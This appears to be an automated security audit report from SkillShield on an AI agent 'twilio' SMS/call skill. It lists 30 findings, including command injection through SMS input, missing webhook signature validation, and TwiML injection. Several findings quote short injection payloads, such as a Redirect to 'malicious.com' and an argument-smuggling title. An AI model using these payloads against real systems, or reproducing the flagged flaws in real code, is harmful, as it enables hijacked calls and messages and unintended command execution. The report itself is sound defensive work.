Trust Assessment
twilio received a trust score of 10/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 30 findings: 14 critical, 6 high, 9 medium, and 0 low severity. Key findings include Persistence / self-modification instructions, Network egress to untrusted endpoints, Arbitrary command execution.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The Manifest Analysis layer scored lowest at 0/100, indicating areas for improvement.
Last analyzed on February 14, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings30
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Persistence / self-modification instructions Shell RC file modification for persistence Remove any persistence mechanisms. Skills should not modify system startup configurations, crontabs, LaunchAgents, systemd services, or shell profiles. | Manifest | skills/snail3d/clawforgod/skills/twilio/setup.sh:75 | |
| CRITICAL | Network egress to untrusted endpoints HTTP request to raw IP address Review all outbound network calls. Remove connections to webhook collectors, paste sites, and raw IP addresses. Legitimate API calls should use well-known service domains. | Manifest | skills/snail3d/clawforgod/skills/twilio/webhook_server.py:151 | |
| CRITICAL | Arbitrary command execution Python shell execution (os.system, subprocess) Review all shell execution calls. Ensure commands are static (not built from user input), use absolute paths, and are strictly necessary. Prefer library APIs over shell commands. | Manifest | skills/snail3d/clawforgod/skills/twilio/confirm_actions.py:33 | |
| CRITICAL | Arbitrary command execution Python shell execution (os.system, subprocess) Review all shell execution calls. Ensure commands are static (not built from user input), use absolute paths, and are strictly necessary. Prefer library APIs over shell commands. | Manifest | skills/snail3d/clawforgod/skills/twilio/confirm_actions.py:75 | |
| CRITICAL | Arbitrary command execution Python shell execution (os.system, subprocess) Review all shell execution calls. Ensure commands are static (not built from user input), use absolute paths, and are strictly necessary. Prefer library APIs over shell commands. | Manifest | skills/snail3d/clawforgod/skills/twilio/sms_assistant.py:232 | |
| CRITICAL | Arbitrary command execution Python shell execution (os.system, subprocess) Review all shell execution calls. Ensure commands are static (not built from user input), use absolute paths, and are strictly necessary. Prefer library APIs over shell commands. | Manifest | skills/snail3d/clawforgod/skills/twilio/sms_assistant.py:273 | |
| CRITICAL | File read + network send exfiltration .env file access Remove access to sensitive files not required by the skill's stated purpose. SSH keys, cloud credentials, and browser data should never be read by skills unless explicitly part of their declared functionality. | Manifest | skills/snail3d/clawforgod/skills/twilio/SKILL.md:65 | |
| CRITICAL | Credential harvesting Reading well-known credential environment variables Skills should only access environment variables they explicitly need. Bulk environment dumps (os.environ.copy, JSON.stringify(process.env)) are almost always malicious. Remove access to Keychain, GPG keys, and credential stores. | Manifest | skills/snail3d/clawforgod/skills/twilio/call.py:61 | |
| CRITICAL | Credential harvesting Reading well-known credential environment variables Skills should only access environment variables they explicitly need. Bulk environment dumps (os.environ.copy, JSON.stringify(process.env)) are almost always malicious. Remove access to Keychain, GPG keys, and credential stores. | Manifest | skills/snail3d/clawforgod/skills/twilio/conversations.py:24 | |
| CRITICAL | Credential harvesting Reading well-known credential environment variables Skills should only access environment variables they explicitly need. Bulk environment dumps (os.environ.copy, JSON.stringify(process.env)) are almost always malicious. Remove access to Keychain, GPG keys, and credential stores. | Manifest | skills/snail3d/clawforgod/skills/twilio/respond_sms.py:179 | |
| CRITICAL | Credential harvesting Reading well-known credential environment variables Skills should only access environment variables they explicitly need. Bulk environment dumps (os.environ.copy, JSON.stringify(process.env)) are almost always malicious. Remove access to Keychain, GPG keys, and credential stores. | Manifest | skills/snail3d/clawforgod/skills/twilio/sms.py:31 | |
| CRITICAL | Credential harvesting Reading well-known credential environment variables Skills should only access environment variables they explicitly need. Bulk environment dumps (os.environ.copy, JSON.stringify(process.env)) are almost always malicious. Remove access to Keychain, GPG keys, and credential stores. | Manifest | skills/snail3d/clawforgod/skills/twilio/sms_assistant.py:19 | |
| CRITICAL | Command Injection via Untrusted SMS Input (Auto-Mode) The `sms_assistant.py` script, when `DELEGATION_MODE` is set to 'auto', directly executes external commands (`gog calendar create`, `things add`) using arguments derived from untrusted SMS message bodies. Although `subprocess.run` is used with a list (which prevents shell injection), the arguments themselves (e.g., `cmd['title']`, `cmd['date']`, `cmd['time']`, `cmd['due_date']`) are not sanitized. An attacker (or authorized sender) could craft an SMS message containing malicious arguments (e.g., `--title 'My Event --delete-all'`) that could be interpreted as commands or options by the external `gog` or `things` executables, leading to arbitrary command execution or unintended actions. Implement strict input validation and sanitization for all arguments derived from untrusted input before passing them to external commands. Ideally, use dedicated APIs for `gog` and `things` if available, or ensure arguments are properly escaped for the target command's interpretation. Consider keeping `DELEGATION_MODE` to 'confirm' as a primary mitigation. | LLM | sms_assistant.py:126 | |
| CRITICAL | Missing Twilio Signature Validation in Webhook Server The `SKILL.md` documentation explicitly states that `webhook_server.py` 'Validates Twilio signatures for security'. However, the provided `webhook_server.py` code does not implement or call any function to validate Twilio's X-Twilio-Signature header. This critical omission means that any actor can send POST requests to the webhook endpoint, impersonating Twilio, and inject arbitrary SMS messages. This bypasses a fundamental security control and allows unauthorized triggering of the `sms_assistant.py` logic, making the command injection and prompt injection vulnerabilities exploitable by anyone with network access to the webhook. Implement Twilio signature validation using `twilio.request_validator.RequestValidator` as described in Twilio's documentation. All incoming POST requests to the `/sms` endpoint must be validated against the `X-Twilio-Signature` header and the `TWILIO_AUTH_TOKEN`. Reject requests that fail validation with a 401 Unauthorized response. | LLM | webhook_server.py:60 | |
| HIGH | Dangerous call: subprocess.run() Call to 'subprocess.run()' detected in function 'execute_calendar_action'. This can execute arbitrary code. Avoid using dangerous functions like exec/eval/os.system. Use safer alternatives. | Static | skills/snail3d/clawforgod/skills/twilio/confirm_actions.py:33 | |
| HIGH | Dangerous call: subprocess.run() Call to 'subprocess.run()' detected in function 'execute_task_action'. This can execute arbitrary code. Avoid using dangerous functions like exec/eval/os.system. Use safer alternatives. | Static | skills/snail3d/clawforgod/skills/twilio/confirm_actions.py:75 | |
| HIGH | Dangerous call: subprocess.run() Call to 'subprocess.run()' detected in function 'add_to_calendar'. This can execute arbitrary code. Avoid using dangerous functions like exec/eval/os.system. Use safer alternatives. | Static | skills/snail3d/clawforgod/skills/twilio/sms_assistant.py:232 | |
| HIGH | Dangerous call: subprocess.run() Call to 'subprocess.run()' detected in function 'add_task'. This can execute arbitrary code. Avoid using dangerous functions like exec/eval/os.system. Use safer alternatives. | Static | skills/snail3d/clawforgod/skills/twilio/sms_assistant.py:273 | |
| HIGH | Command Injection via Pending Actions (confirm_actions.py) The `confirm_actions.py` script processes pending actions stored in `pending_actions.json`, which originate from untrusted SMS messages. It executes external commands (`gog calendar create`, `things add`) via `subprocess.run` using arguments directly from this JSON file. While interactive confirmation is the default, the `auto_confirm` function bypasses this. Even with interactive confirmation, a user might inadvertently confirm a malicious command if the arguments (e.g., `title`, `date`, `time`, `due_date`) contain crafted input that exploits the external executables. Implement strict input validation and sanitization for all arguments loaded from `pending_actions.json` before passing them to external commands. Ensure that `gog` and `things` arguments are treated as literal strings and cannot be interpreted as commands or options. Avoid using `auto_confirm` for actions derived from untrusted input. | LLM | confirm_actions.py:30 | |
| HIGH | Prompt Injection via TwiML Response in Webhook Server The `webhook_server.py` constructs a TwiML response using an f-string: `twiml = f'<?xml version="1.0" encoding="UTF-8"?><Response><Message>{reply_text}</Message></Response>'`. The `reply_text` is derived from `sms_assistant.py`, which processes untrusted SMS input. If `reply_text` contains XML special characters (e.g., `<`, `>`, `&`, `'`, `"`) or TwiML tags (e.g., `</Message><Redirect url="http://malicious.com" />`), it could inject arbitrary TwiML instructions into Twilio's response. This could lead to redirection of subsequent messages/calls, data exfiltration, or other unintended actions by Twilio. Use Twilio's official TwiML generation libraries (e.g., `twilio.twiml.MessagingResponse`) to construct responses. These libraries automatically handle XML escaping of user-provided text, preventing TwiML injection. For example, `response = MessagingResponse(); response.message(reply_text)`. | LLM | webhook_server.py:100 | |
| MEDIUM | Missing required field: name The 'name' field is required for claude_code skills but is missing from frontmatter. Add a 'name' field to the SKILL.md frontmatter. | Static | skills/snail3d/clawforgod/skills/twilio/SKILL.md:1 | |
| MEDIUM | Suspicious import: requests Import of 'requests' detected. This module provides network or low-level system access. Verify this import is necessary. Network and system modules in skill code may indicate data exfiltration. | Static | skills/snail3d/clawforgod/skills/twilio/call.py:7 | |
| MEDIUM | Sensitive path access: Environment file Access to Environment file path detected: '.env.local'. This may indicate credential theft. Verify that access to this sensitive path is justified and declared. | Static | skills/snail3d/clawforgod/skills/twilio/SKILL.md:65 | |
| MEDIUM | Persistence mechanism: Shell RC file modification Detected Shell RC file modification pattern. Persistence mechanisms allow malware to survive system restarts. Review this persistence pattern. Skills should not modify system startup configuration. | Static | skills/snail3d/clawforgod/skills/twilio/setup.sh:75 | |
| MEDIUM | Unpinned Python dependency version Requirement 'twilio>=9.0.0' is not pinned to an exact version. Pin Python dependencies with '==<exact version>'. | Dependencies | skills/snail3d/clawforgod/skills/twilio/requirements.txt:1 | |
| MEDIUM | Unpinned Python dependency version Requirement 'requests>=2.31.0' is not pinned to an exact version. Pin Python dependencies with '==<exact version>'. | Dependencies | skills/snail3d/clawforgod/skills/twilio/requirements.txt:2 | |
| MEDIUM | Unpinned Python dependency version Requirement 'python-dotenv>=1.0.0' is not pinned to an exact version. Pin Python dependencies with '==<exact version>'. | Dependencies | skills/snail3d/clawforgod/skills/twilio/requirements.txt:3 | |
| MEDIUM | Unpinned Python dependency version Requirement 'flask>=2.0.0' is not pinned to an exact version. Pin Python dependencies with '==<exact version>'. | Dependencies | skills/snail3d/clawforgod/skills/twilio/requirements.txt:4 | |
| MEDIUM | Prompt Injection via TwiML in Call Script The `call.py` script constructs TwiML using an f-string: `twiml = f'<?xml version="1.0" encoding="UTF-8"?><Response><Say>{message}</Say></Response>'`. The `message` argument is taken directly from command-line input. If the LLM calling this skill provides malicious XML/TwiML in the `message` (e.g., `</Say><Redirect url="http://malicious.com" />`), it could inject arbitrary TwiML instructions into the call. This could lead to redirection of the call, playing malicious audio, or other unintended actions by Twilio. Use Twilio's official TwiML generation libraries (e.g., `twilio.twiml.VoiceResponse`) to construct responses. These libraries automatically handle XML escaping of user-provided text, preventing TwiML injection. For example, `response = VoiceResponse(); response.say(message)`. | LLM | call.py:38 | |
| INFO | Use of `eval` in Test Script The `test_twilio_setup.sh` script uses `eval "$command"` to execute test commands. While in this specific context the `command` variable is hardcoded within the script and not derived from untrusted user input, `eval` is a dangerous primitive that can lead to command injection if its input were ever to be sourced from untrusted data. It's generally best practice to avoid `eval` where safer alternatives exist. Replace `eval` with safer alternatives for executing commands, such as direct execution or `bash -c` with proper quoting, even in test scripts. For example, `bash -c "$command"` or `sh -c "$command"`. | LLM | test_twilio_setup.sh:26 |
Scan History
Embed Code
[](https://skillshield.io/report/b5605ab1dd95c8b4)
Powered by SkillShield